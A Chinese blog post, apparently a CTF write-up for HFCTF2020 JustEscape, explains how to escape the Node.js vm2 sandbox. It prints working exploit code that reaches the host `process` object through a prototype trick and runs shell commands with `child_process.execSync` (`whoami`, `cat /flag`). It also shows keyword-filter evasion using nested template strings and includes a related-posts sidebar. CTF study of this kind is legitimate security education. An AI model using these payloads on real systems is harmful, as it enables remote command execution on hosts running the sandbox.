[HFCTF2020]JustEscape vm沙箱逃逸

最新推荐文章于 2024-04-13 09:58:20 发布
原创 最新推荐文章于 2024-04-13 09:58:20 发布 · 744 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #docker #linux

本文探讨了一种针对vm2库的沙箱逃逸技术,通过利用TypeError原型链上的get_process属性和Buffer对象的扩展性,尝试执行恶意代码。作者分享了两种绕过关键字过滤的方法,并给出了具体的代码示例,展示了如何通过错误处理和Proxy对象来尝试执行shell命令获取系统信息。然而,其中一个方法导致了TypeError错误。

[HFCTF2020]JustEscape
先用Error().stack测试一下,确定是vm.js
这个老哥写的沙箱逃逸https://github.com/patriksimek/vm2/issues/225
在这里插入图片描述

"use strict";
const {VM} = require('vm2');
const untrusted = '(' + function(){
	TypeError.prototype.get_process = f=>f.constructor("return process")();
	try{
		Object.preventExtensions(Buffer.from("")).a = 1;
	}catch(e){
		return e.get_process(()=>{}).mainModule.require("child_process").execSync("whoami").toString();
	}
}+')()';
try{
	console.log(new VM().run(untrusted));
}catch(x){
	console.log(x);
}

对于网站过滤的关键字,比如prototype,可以

[`${`${`prototyp`}e`}`]

也可以

[`p`,`r`,`o`,`t`,`o`,`t`,`y`,`p`,`e`]

(function (){
    TypeError[`${`${`prototyp`}e`}`][`${`${`get_pro`}cess`}`] = f=>f[`${`${`constructo`}r`}`](`${`${`return proc`}ess`}`)();
    try{
        Object.preventExtensions(Buffer.from(``)).a = 1;
    }catch(e){
        return e[`${`${`get_pro`}cess`}`](()=>{}).mainModule[`${`${`requir`}e`}`](`${`${`child_proces`}s`}`)[`${`${`exe`}cSync`}`](`cat /flag`).toString();
    }
})()

在这里插入图片描述
这个老哥的另外一个绕过我也试了,但是会报错TypeError: e is not a function

(function(){
	try{
		Buffer.from(new Proxy({}, {
			getOwnPropertyDescriptor(){
				throw f=f[`${`${`constructo`}r`}`](`${`${`return proc`}ess`}`)();
			}
		}));
	}catch(e){
		return e(()=>{}).mainModule[`${`${`requir`}e`}`](`${`${`child_proces`}s`}`)[`${`${`exe`}cSync`}`](`cat /flag`).toString();
	}
})()
scrawman
关注
BUUCTF-JustEscape
shawdow_bug的博客
07-16 547
Node.js 题目-- 沙盒绕过
[HFCTF2020]JustEscape
fmyyy1的博客
04-13 1267
场景 最低行提示不是php,测试过后发现是nodejs。 是vm2的沙箱逃逸问题。 github上有现成的poc https://github.com/patriksimek/vm2/issues/225 "use strict"; const {VM} = require('vm2'); const untrusted = '(' + function(){ TypeError[`${`${`prototyp`}e`}`].get_process = f=>f.constructor(
BUUCTF-[HFCTF2020]JustEscape
qq_24033605的博客
11-04 676
[HFCTF2020]JustEscape 题目说真的不是PHP吗? 十有八九不是,猜测可能是Java,结果是js。 用Error().stack,看一下报错信息。 报错显示是vm.js,考的vm沙箱逃逸。 POC参考: https://github.com/patriksimek/vm2/issues/225 payload1: (function (){ TypeError[`${`${`prototyp`}e`}`][`${`${`get_pro`}cess`}`] = f=>f[`$
NodeJS vm&vm2沙箱逃逸
leekos的博客,分享web安全相关知识~
08-05 2143
在讲沙箱逃逸之前,我们需要了解一下什么是沙箱沙箱就是一个集装箱,把你的应用装到沙箱里去运行,这样应用与应用之间就产生了边界,不会相互影响。当我们运行一些可能产生危害的程序时,我们不能直接在主机上运行。我们可以单独开辟一个运行代码的环境,这个环境就是沙箱,它与主机相互隔离,但使用主机的资源,但有危害的代码在沙箱内运行只会对沙箱内部产生一些影响,不影响主机的功能。
node.js--vm沙箱逃逸初探
m0_62422842的博客
01-04 2535
前几天遇到一个考察vm沙箱逃逸的题目,由于这个点是第一次听说,所以就花时间了解了解什么是沙箱逃逸。此篇文章是对于自己初学vm沙箱逃逸的学习记录,若记录知识有误,欢迎师傅们指正。就只针对于node.js而言,沙箱docker容器其实是差不多的,都是将程序与程序之间,程序与主机之间互相分隔开,但是沙箱是为了隔离有害程序的,避免影响到主机环境。为什么node.js语言要引入沙箱,这就要说说js语言中的作用域(也叫上下文)。------->输出undefined-------->输出100。
[HFCTF2020]JustEscape 记录
m0_63045593的博客
04-20 219
<?php if( array_key_exists( "code", $_GET ) && $_GET[ 'code' ] != NULL ) { $code = $_GET['code']; echo eval(code); } else { highlight_file(__FILE__); } ?> 输入Error().stack猜测是不是js 是VM2沙盒逃逸用payload直接打 (function (){ TypeError[`
沙箱逃逸技术总结
09-11
沙箱逃逸技术总结。
第 五 周 write up [[HFCTF2020]JustEscape [BJDCTF2020]EasySearch HCTF-2018-Web-warmup]
tothemoon的博客
10-22 1964
我的博客:[http://tothemoon2019.github.io](https://tothemoon2019.github.io/2020/10/21/%E7%AC%AC%20%E4%BA%94%20%E5%91%A8%20write%20up%20%5B%5BHFCTF2020%5DJustEscape%5D/) 文章目录[HFCTF2020]JustEscape(VM沙箱逃逸)0x000x0112success[BJDCTF2020]EasySearch(shtml,ssi注入)ssi注入su
CTF-PWN-沙箱逃脱-【seccomp和prtcl-2】
llovewuzhengzi的博客
01-08 2050
ret的gadget的地址。直到通过该得到的栈地址-231*8可得到数组的起始地址,然后输入open的第一个参数在此位置即./flag,注意此时由于函数此时是整数输入,输入的字节会逆序排放到内存中,而调用open时是字符串参数,会从低地址到高地址一个一个转换,所以此时我们需要逆序输入./flag的字节即按galf/.字节输入。接下来就构造ROP链即可,首先是open(数组的初始地址,0,2) rax=2,此时构造的rdx不会对函数有影响,只是使得第二个参数和rax的值一样得以成功调用系统调用。
python图灵测试_一道简单的CTFpython沙箱逃逸题目
weixin_39640417的博客
12-09 764
看了几天的ssti注入然后了解到有python沙箱逃逸学过ssti注入的话python沙箱逃逸还是很容易理解的。看一道CTF题目,源码的话我改了改,一开始不能用,直接在py2上运行就好。题目要求读取./key的值,我们这里来执行命令。def make_secure():UNSAFE = ['open','file','execfile','compile','reload','__import__...
ctf php沙箱,分析Python沙箱逃逸问题
weixin_39691233的博客
03-16 564
[TOC](基于 Python 2.7)在解决 Python 沙箱逃逸这个问题之前,需要先了解 Python 中的一些语法细节。如果已经了解了eval函数的使用方法,就可以跳过第一和第二部分,直接看 3x00 吧。0x00 表达式的执行用执行某个表达式的内容,可以使用 exec 或 eval 来进行。0x01 execexec_stmt: "exec" expression ["in" ex...
ctf php沙箱,从一个CTF题目学习Python沙箱逃逸
weixin_33225892的博客
03-16 765
作为一个CTF爱好者,又是一个Bin选手,在国外各种受虐的同时,总是能学到不少的东西。最近,和师傅们在做国外的CTF题,做到一种Pwn题目,是需要选手在Python沙箱达到逃逸的目的,获取flag。在谷歌的过程中,找到了一篇不错的博文。正文注意:这是为Python 2.7.3编写的。这些细节可能在其他版本的Python - 特别是Python3 - 有所不同!尝试逃离沙箱总是一个有趣的挑战。Py...
CTF-web 第七部分 flask模板注入 沙箱逃逸
iamsongyu的博客
10-17 9180
1 注入原理 Flask 是python语言编写的轻量级的MVC (也可以称为MTV, T: Template)框架具体详见http://docs.jinkan.org/docs/flask/  对于Flask 框架本身,本文不做讨论。   我们看一下测试代码中的 hello_ssti函数 【功能 打印 hello + 用户传入的name值】 函数中模板内容  template = ''...
nodejs VM沙箱绕过
qq_44829421的博客
08-03 523
当我们运行一些可能会产生危害的程序,我们不能直接在主机的真实环境上进行测试,所以可以通过单独开辟一个运行代码的环境,它与主机相互隔离,但使用主机的硬件资源,我们将有危害的代码在沙箱中运行只会对沙箱内部产生一些影响,而不会影响到主机上的功能,沙箱的工作机制主要是依靠重定向,将恶意代码的执行目标重定向到沙箱内部。
NodeJS VM沙箱逃逸_let sandbox = object(1),2024年最新算法太TM重要了
最新发布
2401_83946826的博客
04-13 807
因为此时age已经挂载在global上了,它的作用域已经不在1中了。
Python沙箱逃逸练习题源码解析与实践
资源摘要信息: "沙箱逃逸练习题python源码" 沙箱逃逸是指在沙箱环境中运行的程序,试图绕过沙箱的限制,访问或控制沙箱外的系统资源。这种技术常被用于网络安全攻防演练中,以测试沙箱的安全性。在CTF(Capture The...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值